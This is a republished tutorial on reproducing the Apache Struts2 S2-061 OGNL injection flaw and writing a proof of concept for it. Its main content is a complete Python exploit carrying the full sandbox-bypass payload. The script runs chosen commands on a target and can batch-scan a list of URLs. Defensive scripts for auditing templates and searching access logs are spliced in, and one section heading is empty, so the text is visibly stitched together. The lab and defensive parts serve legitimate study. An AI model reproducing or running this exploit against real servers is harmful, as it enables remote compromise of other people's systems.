2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article describes how to reproduce the Struts2 S2-061 remote command execution vulnerability and how to write a PoC for it. The content is fairly detailed; interested readers can use it for reference, and I hope it is helpful to you.
1. Introduction
Apache Struts2 is a web framework for developing Java EE applications. On December 8, 2020, Apache Struts disclosed the S2-061 remote code execution vulnerability (CVE-2020-17530). When certain tags are used, OGNL expression injection may be possible, resulting in remote code execution; the risk is high.
2. Vulnerability principle
By constructing a malicious OGNL expression, an attacker causes Struts2 to evaluate the OGNL expression a second time, resulting in remote code execution.
The vulnerability takes advantage of the secondary (double) evaluation that Struts2 performs on the values of some tag attributes (such as id). When `%{x}` is used in such a tag attribute and the value of `x` is controllable by the user, the attacker places an OGNL expression in the payload; OGNL can then access object properties and execute system commands.
3. Affected versions:
Struts 2.0.0 to Struts 2.5.25
4. PoC writing
4.1 Code writing
The script is written in Python and imports four libraries: requests, sys, re and OptionParser.
In fact, at the beginning the code had only the function def s2_file, which batch scans all the URLs inside a txt file.
But my cousin said that the human-computer interaction of my code was too poor, so I added two things: the function def s2_url (to scan a single URL) and an option parser (to set the usage options).
```python
# -*- coding: utf-8 -*-
'''
author: Sweetmelon
time: 2020-12-14
s2-061 poc
'''
import re
import sys
from optparse import OptionParser

import requests


def build_payload(command="id"):
    # URL-encoded OGNL expression from the original script; the command is spliced into #cmd
    return "%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27" + command + "%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"


def s2_file(filename, command="id"):
    # batch scan: one URL per line in the txt file
    with open(filename, 'r', encoding='utf-8') as F1:
        for line in F1:
            url = line.strip() + "/index.action?id=" + build_payload(command)
            # print(url)
            r = requests.get(url).text
            # print(r)
            z = re.findall("an id=.*", r)
            output = str(z).replace("an id=\"", "")
            # print(output)
            if "uid" in output:
                print(line.strip() + " struts2-061 vulnerability exists")
            else:
                print(line.strip() + " struts2-061 vulnerability does not exist")


def s2_url(url, command="id"):
    # single-URL scan: prints whatever the id attribute contains in the response
    url = url + "/index.action?id=" + build_payload(command)
    # print(url)
    r = requests.get(url).text
    # print(r)
    z = re.findall("an id=.*", r)
    output = str(z).replace("an id=\"", "")
    print(output)


if __name__ == "__main__":
    usage = "Usage1: %prog -f filename\nUsage2: %prog -u url -c command"
    parser = OptionParser(usage=usage)
    # option names are reconstructed from the usage string; the original add_option lines were garbled in extraction
    parser.add_option('-f', '--filename', dest='filename', help='Input a txt file of URLs')
    parser.add_option('-u', '--url', dest='url', help='Input URL')
    parser.add_option('-c', '--command', dest='command', default='id', help='Input command')
    (options, args) = parser.parse_args()
    # print(type(options.url))
    # print(options.url)
    if options.filename and options.url is None:
        # print(options.filename)
        s2_file(options.filename)
    if options.url and options.filename is None:
        # print(options.url)
        s2_url(options.url, options.command)
    if options.filename and options.url:
        print("Usage1: " + sys.argv[0] + " -f filename\nUsage2: " + sys.argv[0] + " -u url -c command")
    if options.filename is None and options.url is None:
        print(sys.argv[0] + " -h")
```
4.2 Payload analysis (Mr. Zheng's small class)
(1) The first payload
Why is the payload so long? In order to bypass the sandbox (in fact, S2-061 is a bypass of the S2-059 fix).
The known OGNL sandbox restrictions are:
Cannot instantiate (new) objects
Cannot call methods or properties of blacklisted classes and packages
Cannot use reflection
Cannot call static methods
The operations the OGNL sandbox does not restrict are:
Public property setters/getters of objects can assign and read values, and static properties can be accessed.
Method calls on instantiated classes (objects in OgnlContext); static methods may not be called.
So at present we can only look for usable objects in OgnlContext.
To go deeper you need to understand the whole Struts2 project and OGNL syntax. Even without that depth, the idea is this: the OGNL syntax can be used to reset the blacklist (the excludedClasses and excludedPackageNames sets on memberAccess), after which the command execution method of an otherwise blocked command execution class becomes reachable.
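The condition the section above describes, a forced evaluation `%{x}` inside a tag attribute whose value an attacker controls, is what a code reviewer should hunt for in the application's own templates. The following added example is not part of the original article or its PoC: it is a small audit script that scans JSP text for `%{...}` expressions inside Struts `<s:...>` tag attributes and reports each one for review. The JSP sample, its tag names and attribute values are constructed for the example.

```python
import re

# A Struts tag: <s:name attr="..." ...> or self-closing <s:name ... />
TAG_RE = re.compile(r"<s:(?P<tag>[A-Za-z]+)\b(?P<attrs>[^>]*)>")
# One attribute inside the tag; values are assumed to be double-quoted
ATTR_RE = re.compile(r'(?P<name>[A-Za-z_:-]+)\s*=\s*"(?P<value>[^"]*)"')
# Forced OGNL evaluation marker %{...} inside an attribute value
FORCED_EVAL_RE = re.compile(r"%\{([^}]*)\}")


def find_forced_evaluation(jsp_text):
    """Return one finding per %{...} found in an <s:...> tag attribute.

    Each finding records the line number, tag, attribute and the expression
    inside the braces. Whether a finding is exploitable depends on whether the
    expression (for example 'id') is fed from a request parameter, which the
    reviewer must confirm in the action class.
    """
    findings = []
    for tag in TAG_RE.finditer(jsp_text):
        line_no = jsp_text.count("\n", 0, tag.start()) + 1
        for attr in ATTR_RE.finditer(tag.group("attrs")):
            for expr in FORCED_EVAL_RE.finditer(attr.group("value")):
                findings.append({
                    "line": line_no,
                    "tag": tag.group("tag"),
                    "attr": attr.group("name"),
                    "expr": expr.group(1).strip(),
                })
    return findings


# Constructed sample template (not from the article). The first tag mirrors the
# pattern the article describes: an id attribute set to %{id}.
SAMPLE_JSP = """<%@ taglib prefix="s" uri="/struts-tags" %>
<html><body>
<s:a id="%{id}" href="/profile">Profile</s:a>
<s:textfield name="user" id="userField"/>
<s:property value="%{#session.user}"/>
<s:property value="Literal text, no evaluation"/>
</body></html>
"""


if __name__ == "__main__":
    for f in find_forced_evaluation(SAMPLE_JSP):
        print("line %(line)d: <s:%(tag)s %(attr)s=\"%%{%(expr)s}\"> "
              "-> check whether '%(expr)s' is user-controlled" % f)
```

The scan deliberately reports every forced evaluation, including ones such as `#session.user` that are not attacker-controlled, because the triage step (tracing where the expression's value comes from) is the reviewer's job; the script only narrows the search. Single-quoted attribute values are not matched by this version. The vendor fix for S2-061 is to upgrade to Struts 2.5.26, and the general rule is not to use forced evaluation on values that originate from the request.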
(2) The second payload
5. Vulnerability reproduction
5.1 Building the vulnerable environment
(1) Install Docker on Kali
```shell
# Preparation: make sure your Kali Linux is completely up to date before you start.
# Add the Docker PGP key. Because access to the official Docker site is slow domestically,
# the Tsinghua mirror is used instead:
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
# Configure the Docker APT repository:
echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
# Update APT:
sudo apt-get update
# Install Docker. If an old version of Docker is installed, uninstall it first:
sudo apt-get remove docker docker-engine docker.io
# Install docker:
sudo apt-get install docker-ce
# View docker status:
sudo systemctl status docker
# Start docker:
sudo systemctl start docker
# Start docker automatically at boot:
sudo systemctl enable docker
# View the installed version:
sudo docker version
```
(2) Download vulhub-master and put it on Kali
git clone https://github.com/vulhub/vulhub.git
(3) Enter the directory vulhub-master/struts2/s2-061
Start the target range: docker-compose up -d
5.2 Verifying the vulnerability
(1) Open http://192.168.8.135:8080/ in a browser
(2) Manual verification by packet capture
Capture the request and you can see the signature of this vulnerability: /.action?id=
Put the payload there, and you can see that the response packet returns the result of our command execution request.
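The same signature, an .action request whose id parameter carries a URL-encoded `%{` expression, is what a defender can hunt for in web server logs after the fact. The following added example is not code from the original article: it decodes each query parameter of the request target in Apache-style access log lines and flags forced OGNL evaluation, raising the severity when the decoded value also contains the sandbox-tampering names used by the payload analysed in section 4.2 (InstanceManager, newInstance, memberAccess, excludedClasses, excludedPackageNames, exec). The log lines and IP addresses are constructed for the example, and the flagged request is a deliberately truncated fragment, not a working payload.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined"-style access log line (format assumed for the example)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# %{ or ${ after decoding: forced-evaluation syntax inside a parameter value
FORCED_EVAL_RE = re.compile(r"[%$]\{")
# Names the S2-061 payload uses to reset the OGNL sandbox and reach command execution
SANDBOX_TAMPER = (
    "#application", "instancemanager", "newinstance", "memberaccess",
    "excludedclasses", "excludedpackagenames", ".exec(",
)


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (the payload is sent as %25%7b, i.e. %{)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_target(target):
    """Classify one request target (path?query).

    Returns (verdict, reasons); verdict is 'ognl-sandbox-bypass',
    'ognl-forced-eval' or 'clean'.
    """
    reasons = []
    verdict = "clean"
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)  # parse_qsl already decoded one layer
        if not FORCED_EVAL_RE.search(value):
            continue
        lowered = value.lower()
        tamper = [t for t in SANDBOX_TAMPER if t in lowered]
        if tamper:
            verdict = "ognl-sandbox-bypass"
            reasons.append("param %r: forced OGNL evaluation with sandbox tampering (%s)"
                           % (name, ", ".join(tamper)))
        else:
            if verdict == "clean":
                verdict = "ognl-forced-eval"
            reasons.append("param %r: forced OGNL evaluation marker" % name)
    return verdict, reasons


def scan_access_log(lines):
    """Return one record per flagged request, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict, reasons = classify_target(m.group("target"))
        if verdict != "clean":
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "target": m.group("target"), "verdict": verdict,
                         "reasons": reasons})
    return hits


# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
# The second line is a truncated fragment carrying the payload's indicators.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2020:10:00:01 +0000] "GET /index.action?id=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Dec/2020:10:00:02 +0000] "GET /index.action?id=%25%7b(%23UnicodeSec%3d%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23sm.put(%27excludedClasses%27%2c%23emptySet))%7d HTTP/1.1" 200 734',
    '192.0.2.10 - - [14/Dec/2020:10:00:03 +0000] "GET /search.action?q=%7Bfoo%7D HTTP/1.1" 200 310',
    '198.51.100.7 - - [14/Dec/2020:10:00:04 +0000] "GET /index.action?id=%25%7b1%2b1%7d HTTP/1.1" 200 511',
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["verdict"], "; ".join(hit["reasons"]))
```

Two tiers are deliberate: a bare `%{...}` in a parameter is worth a look but also appears in probing and in false positives, while `%{...}` combined with the sandbox-reset names is the S2-061 pattern itself. Plain braces without the leading `%` or `$` (the `/search.action?q={foo}` line) are not flagged, and a value that was percent-encoded twice is still caught because decoding is repeated until it stops changing.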
(3) PoC script verification
That is all on how to reproduce the Struts2 S2-061 remote command execution vulnerability and write a PoC. I hope the above content is of some help to you and lets you learn something more. If you think the article is good, you can share it so that more people see it.